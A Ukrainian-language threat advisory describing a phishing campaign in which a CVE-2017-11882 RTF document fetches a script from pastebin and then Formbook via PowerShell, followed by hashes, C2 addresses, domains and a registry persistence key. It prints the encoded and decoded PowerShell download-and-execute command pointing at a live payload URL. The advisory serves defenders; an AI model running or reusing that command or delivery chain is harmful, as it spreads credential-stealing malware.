Чергова кампанія розсилання шкідливих електронних листів

Зафіксовано розсилання шкідливих електронних листів, що містять шкідливе вкладення типу .doc, яке експлуатує вразливість cve-2017-11882 для завантаження екземпляру шкідливого програмного забезпечення класу Formbook. Особливістю є використання багатоетапного завантаження з використанням публічного сервісу зберігання текстових даних pastebin.com, подібна техніка використовувалась раніше.

Зразок електронного повідомлення:

Детальний опис:

У вкладенні листів знаходиться rtf-документ RSEBBScan0023.doc, що містить вкладений OLE Object

при відкритті якого шляхом експлуатації вразливості #CVE-2017-11882 відбувається запуск EQNEDT32.exe та виконання вкладеного OLE Object, що містить команди для завантаження та виконання VBS сценарію.

Завантаження відбувається з публічного сервісу для зберігання даних у текстовому форматі - pastebin.com з використання протоколу https за посиланням
hxxps://pastebin.com/raw/232YvPmw (ip-адреса 104.20.209.21, порт 443)

За результатами виконання VBScript відбувається запуск powershell для завантаження шкідливого файлу, його збереження (C:\Users\user\AppData\Local\Temp\bakdraw.exe) та запуску.

Кодована в Base64 команда powershell:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop -w 1 -e aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABmAGkAbABlA
CgAIgBoAHQAdABwADoALwAvAG0AYQB0AHQAYwBhAHMALgBjAG8AbQAuAGgAawAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAFIAZQBx
AHUAZQBzAHQAcwAvAEMAbwBvAGsAaQBlAC8ALgB0AGUAbQBwAC8AMAAzAC8AawBpAG4AZwAuAGUAeABlACIALAAiACQAZQBuAHYAOgB
0AGUAbQBwAFwAYgBhAGsAZAByAGEAdwAuAGUAeABlACIAKQApADsA

Декодована команда:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe –nop –w 1 iex ((new-object net.webclient).downloadfile("http://mattcas.com.hk/wp-includes/Requests/Cookie/.temp/03/king.exe","$env:temp\bakdraw.exe"));

Завантажений файл є запакованим зразком шкідливого програмного забезпечення типу Formbook, що на відміну від інших викрадачів, може отримати облікові дані авторизації з веб-форм до TLS шифрування, навіть якщо використовується віртуальна клавіатура, автоматичне заповнення або буфер обміну.

Завантажений файл перевіряє середовище виконання на предмет виявлення пісочниць та віртуальних середовищ, після чого відбувається ін'єкція шкідливого коду в один випадково вибраний службовий процес із каталогу System32.

Інфікований системний процес закріплюється в системі через гілку системного реєстру HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, проводить збір інформації та її збереження в каталозі %AppData% користувача, запускає та інфікує процес firefox.exe для збору інформації із нього, інфікує процес explorer.exe, що відправляє викрадені дані у зашифрованому вигляді на адреси С2-серверів через HTTP методом POST.

Рівень загрози: СЕРЕДНІЙ

Поштовий лист  –>  *.doc (rtf)  –>  EQNEDT32.exe –> GET URL(pastebin.com) ->  powershell –> *.exe(FORMBOOK) –>Evader&Exploiter&Spyware

Механізм роботи:

Індикатори кіберзагроз:

IP адреса з якої проводиться розсилання

     185.81.166.184

Main object - "RSEBBScan0023.doc"

     sha256 42b6ae9716127e1bc219c3d19a3e43ffacbd974a111b8553fbf71f95b692e22d
     sha1      1ece20615e66988cf706e99734190cab274335b7
     md5      7639e2ab7b299c5a0f3da3f1d4f48446

Dropped object - "bakdraw.exe"

     sha256 bee3e25367dae97e0889854b5dec10b8e7ca737923b351b8b08d7a9572127bc8
     sha1      46c788841de65fa766e98b26dc52b3c59e6e6094
     md5      4c18b86134e4ff08995423340cdce7b4

Dropped executable file

     sha256 C:\Users\admin\AppData\Local\Temp\amorality.dll                  d6e566476f58d60c33e1942ec608df4d02b36b84b626281e18b78d4242d78df5
     sha256 C:\Users\admin\AppData\Local\Temp\nsyE927.tmp\System.dll a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1

DNS requests

     domain pastebin.com
     domain mattcas.com.hk
     domain www.youxisousuo.com
     domain www.roohosting.online
     domain www.design-linkage.com
     domain www.gianlucacolombo.net
     domain www.wireboz.com
     domain www.raspimania.net
     domain www.mmweddingplanners.com
     domain www.bulnitayiesfde.com
     domain www.wauay.com
     domain www.findinghearth.com
     domain www.inside-net.com
     domain www.new-and-recycled.com
     domain www.anti3u.com
     domain www.vdmoijrno.com
     domain www.equifaxsecuriuy2017.com
     domain www.dumb.ltd
     domain www.eamrepp.com
     domain www.tikiislandboats.com
     domain www.anodistribution.com
     domain www.youxisousuo.com
     domain www.biesenbach.info
     domain www.sohogreenbay.net

Connections

     ip 104.20.209.21 download VBA script (Pastebin)
     ip 58.82.193.216 dropped exe
     ip 27.124.118.252 C2
     ip 49.212.207.151 C2
     ip 91.194.91.202 C2
     ip 199.192.26.182 C2
     ip 23.20.239.12 C2
     ip 184.168.131.241 C2
     ip 85.128.128.104 C2
     ip 103.79.176.204 C2
     ip 35.246.6.109 C2
     ip 81.169.145.86 C2

HTTP/HTTPS requests

     url hxxps://pastebin.com/raw/232YvPmw download VBA script from pastebin
     url hxxp://mattcas.com.hk/wp-includes/Requests/Cookie/.temp/03/king.exe download exe
     url hxxp://www.design-linkage.com/c190/?hBs=Y37ShsJ8b7VBoaTj30mIjDP/PwEL1jtRgEUZvJxkc66zU1vDDhCApAWOT/hIXtAWMmhFwQ==&mNYx=VZ4TBFeX&sql=1
     url hxxp://www.roohosting.online/c190/?hBs=hd8Y8muCtEZhCv8ALKPgHK95tYDhYYDxelL8xD4S8O0L500na6sRHMWWvR9un0dmK2fFsA==&mNYx=VZ4TBFeX
     url hxxp://www.design-linkage.com/c190/
     url hxxp://www.gianlucacolombo.net/c190/?hBs=wcRGop6P8GSyN0OG59L6Y2jBJcUgFYPG3McKEZTQYlaCAyMeNVJJkEAIn7SvAC160HeFeQ==&mNYx=VZ4TBFeX&sql=1
    url hxxp://www.wireboz.com/c190/
    url hxxp://www.gianlucacolombo.net/c190/
    url hxxp://www.wireboz.com/c190/?hBs=9rjFNiSZVcAsmJ12JlslYLNxXAMC+A9esWaGRjTWwv1KaJGYIPyYrbZMaSQCjjD+4j9nKg==&mNYx=VZ4TBFeX
    url hxxp://www.findinghearth.com/c190/?hBs=pQERSKm9xYRn1wJK+q6TaJUR9sxws8FoYF86g/ZBrtFE+MUdAxh2xelEHvS2+N5m/pDLEg==&mNYx=VZ4TBFeX
    url hxxp://www.mmweddingplanners.com/c190/
    url hxxp://www.mmweddingplanners.com/c190/?hBs=COY46yMI64czqhsWaiuV9snNklVjvOR8AbbkzQrTt7Yl0nF6lhUnyncVRFvVA2m+x9mVIQ==&mNYx=VZ4TBFeX
    url hxxp://www.findinghearth.com/c190/
    url hxxp://www.wauay.com/c190/
    url hxxp://www.wauay.com/c190/?hBs=hdSc+6cz5u+gM7q0VCz/gch1W0/VbR1qPmQIwQLLDhu9MpHkAdUUXwodWFRSZE+NsgBSvQ==&mNYx=VZ4TBFeX
    url hxxp://www.inside-net.com/c190/
    url hxxp://www.inside-net.com/c190/?hBs=nbd7RvCkAbgr71l/8tzH87GscRMbBlQqpVoYVbI4/nCNHs8Lcc3m03B5hNXwZmv8M5gMtw==&mNYx=VZ4TBFeX
    url hxxp://www.tikiislandboats.com/c190/?WPxD=0MymhALoOQ1QDNcOOK0FVhUWdWUfiFJrsaZqzo++8O4GDfBNyg6jxOS3DKmUppslZ42eJA==&JfG=THihBDzHqn&sql=1
    url hxxp://www.tikiislandbo
ats.com/c190/
    url hxxp://www.biesenbach.info/c190/
    url hxxp://www.biesenbach.info/c190/?WPxD=HRlbi4UKosc5CregBZJcdIO8cq+rWo0rKZXze6if5j9RUlHiN/MIGfpRZ5voGqvOF7aEIA==&JfG=THihBDzHqn&sql=1

Registry

     Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
     Name Z8LPCTBPGJX
     Value C:\Program Files\Nbrk\autochkxbjhankh.exe